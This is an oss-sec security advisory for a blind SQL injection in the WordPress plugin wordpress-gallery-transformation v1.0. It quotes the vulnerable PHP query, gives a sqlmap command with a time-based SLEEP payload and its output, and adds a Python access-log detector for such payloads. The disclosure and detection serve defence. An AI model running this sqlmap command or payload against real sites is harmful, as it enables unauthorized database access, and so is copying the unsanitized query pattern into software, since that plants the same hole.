oss-sec mailing list archives
Blind SQL Injection in Wordpress plugin wordpress-gallery-transformation v1.0
From: "Larry W. Cashdollar" <larry0 () me com>
Date: Fri, 25 Aug 2017 12:03:02 -0400
Title: Authenticated Blind SQL Injection in Wordpress plugin wordpress-gallery-transformation v1.0
Author: Larry W. Cashdollar, @_larry0
Date: 2017-07-22
CVE-ID: [CVE-2017-1002028]
Download Site: https://wordpress.org/plugins/wordpress-gallery-transformation/
Vendor: http://angrybyte.com
Vendor Notified: 2017-08-07
Vendor Contact: plugins () wordpress org
Advisory: http://www.vapidlabs.com/advisory.php?v=199

Description: Transforms word press into a gallery, wallpapers website, you name it.

Vulnerability: SQL injection in ./wordpress-gallery-transformation/gallery.php. The $jpic variable is taken directly from the picnj GET parameter and interpolated, unsanitized, into an SQL query:

    $pfx=$wpdb->prefix;
    dbcreator();
    if($_GET['picnj']){

        // picnj and nmj come straight from the request with no validation or escaping
        $jpic=$_GET['picnj'];
        $jnm=$_GET['nmj'];
        // $jpic is interpolated unquoted into the WHERE clause, $jnm inside single quotes
        $wpdb->query("update {$pfx}gallery set name='{$jnm}' where id=$jpic;");
        $wpdb->query("update {$pfx}gallery set rates=44");
        return 'ok?';

Exploitation requires an authenticated user who is allowed to manage the gallery.

Exploit Code:

$ sqlmap --load-cookies=./cookie -u 'http://example.com/wp-admin/options-general.php?page=wordpress-gallery-transformation/gallery.php&picnj=*' --level 4 --risk 3 --dbms mysql

URI parameter '#1*' is vulnerable. Do you want to keep testing the others (if any)? [y/N]
sqlmap identified the following injection point(s) with a total of 2556 HTTP(s) requests:
---
Parameter: #1* (URI)
    Type: AND/OR time-based blind
    Title: MySQL >= 5.0.12 time-based blind - Parameter replace
    Payload: http://example.com:80/wp-admin/options-general.php?page=wordpress-gallery-transformation/gallery.php&picnj=(CASE WHEN (4165=4165) THEN SLEEP(5) ELSE 4165 END)
---
[13:16:53] [INFO] the back-end DBMS is MySQL
web server operating system: Linux Ubuntu 16.04 (xenial)
web application technology: Apache 2.4.18
back-end DBMS: MySQL >= 5.0.12
[13:16:53] [INFO] fetched data logged to text files under '/home/larry/.sqlmap/output/example.com'

[*] shutting down at 13:16:53
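As an added example that is not part of the advisory: detection logic run over constructed Apache combined-format access-log lines (the advisory notes the target ran Apache), flagging requests to the plugin's gallery.php whose picnj value is not a plain integer or carries a SLEEP()/BENCHMARK() delay such as the time-based payload sqlmap used above, and nmj values containing a single quote. The log lines, IPs and user agents are constructed for the example.

```python
import re
from urllib.parse import urlsplit, parse_qs

# Constructed Apache combined-format access-log lines (not taken from the advisory).
SAMPLE_LOG = """\
10.0.0.5 - - [25/Aug/2017:13:16:40 -0400] "GET /wp-admin/options-general.php?page=wordpress-gallery-transformation/gallery.php&picnj=12&nmj=beach HTTP/1.1" 200 512 "-" "Mozilla/5.0"
10.0.0.9 - - [25/Aug/2017:13:16:53 -0400] "GET /wp-admin/options-general.php?page=wordpress-gallery-transformation/gallery.php&picnj=(CASE%20WHEN%20(4165%3D4165)%20THEN%20SLEEP(5)%20ELSE%204165%20END) HTTP/1.1" 200 512 "-" "sqlmap/1.1"
10.0.0.9 - - [25/Aug/2017:13:16:54 -0400] "GET /wp-admin/options-general.php?page=wordpress-gallery-transformation/gallery.php&picnj=1%20AND%20SLEEP(5) HTTP/1.1" 200 512 "-" "Mozilla/5.0"
10.0.0.7 - - [25/Aug/2017:13:17:01 -0400] "GET /wp-admin/options-general.php?page=wordpress-gallery-transformation/gallery.php&picnj=7&nmj=it%27s HTTP/1.1" 200 512 "-" "Mozilla/5.0"
"""

# Apache combined log: client IP, timestamp, request line, status code.
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>\S+) (?P<path>\S+) [^"]*" (?P<status>\d{3})'
)
GALLERY_PAGE = "wordpress-gallery-transformation/gallery.php"
# MySQL delay primitives used by time-based blind payloads.
TIME_RE = re.compile(r"\b(SLEEP|BENCHMARK)\s*\(", re.IGNORECASE)

def classify_request(path):
    """Return (param, reason, value) findings for one request path; [] if benign."""
    qs = parse_qs(urlsplit(path).query, keep_blank_values=True)
    if qs.get("page", [""])[0] != GALLERY_PAGE:
        return []
    findings = []
    for raw in qs.get("picnj", []):  # lands unquoted in `where id=$jpic`
        if not raw.isdigit():
            findings.append(("picnj", "non-numeric id", raw))
        if TIME_RE.search(raw):
            findings.append(("picnj", "time-based payload", raw))
    for raw in qs.get("nmj", []):  # lands inside single quotes in `name='{$jnm}'`
        if "'" in raw:
            findings.append(("nmj", "single quote in name", raw))
    return findings

def scan_log(text):
    """Scan access-log text and return one hit dict per finding."""
    hits = []
    for line in text.splitlines():
        m = LOG_RE.match(line)
        if not m:
            continue
        for param, reason, value in classify_request(m["path"]):
            hits.append({"ip": m["ip"], "ts": m["ts"], "param": param,
                         "reason": reason, "value": value})
    return hits
```

The same integer check that classify_request() applies to picnj is what the plugin should enforce server-side before the value reaches the query.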